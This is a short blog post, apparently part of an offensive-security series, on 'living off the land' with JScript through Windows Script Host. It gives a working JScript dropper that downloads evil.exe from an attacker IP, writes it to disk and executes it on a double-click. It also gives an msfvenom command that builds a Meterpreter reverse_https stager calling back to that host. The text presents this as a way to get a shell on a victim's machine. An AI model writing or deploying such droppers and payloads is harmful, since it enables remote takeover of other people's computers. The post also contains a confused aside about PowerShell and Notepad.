This forms part of a new series of blog posts looking at client-side attacks and evasion strategies used by hackers.
When looking at exploiting operating systems and conducting client-side attacks it is very important to learn to "live off the land", this term refers to utilising software already installed on the target machine and learning to understand how the software operates as standard.
In this example, we will be covering Jscript, which is a derivative of JavaScript developed by Microsoft that is used in Internet Explorer. It can also be used outside the browser through Windows Script Host
When executed outside of a web browser, Jscript is not subject to any of the security restrictions enforced by a browser sandbox. This means we can use it as a client-side code execution vector without exploiting any vulnerabilities.
This is very useful, as by default powershell scprits are opened by notepad meaning that if you were to open or click on it by mistake it will open in notpad only showing the text.
Dropper Example
After saving this code as a .js file, all the victim has to do is double-click and the hacker will get a shell from the victim's machine to our metasploit multi/handler listener.
var url = "http://192.168.49.60/evil.exe"
var Object = WScript.CreateObject('MSXML2.XMLHTTP');
Object.Open('GET', url, false);
Object.Send();
if (Object.Status == 200)
{
var Stream = WScript.CreateObject('ADODB.Stream');
Stream.Open();
Stream.Type = 1;
Stream.Write(Object.ResponseBody);
Stream.Position = 0;
Stream.SaveToFile("evil.exe", 2);
Stream.Close();
}
var r = new ActiveXObject("WScript.Shell").Run("evil.exe");Payload Example
The payload used in the example is a .exe created using msfvenom for the reverse shell stager over https on 443. Please note this file will need to be moved to the location of your webserver.
msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.49.60 LPORT=443 -f exe -o evil.exe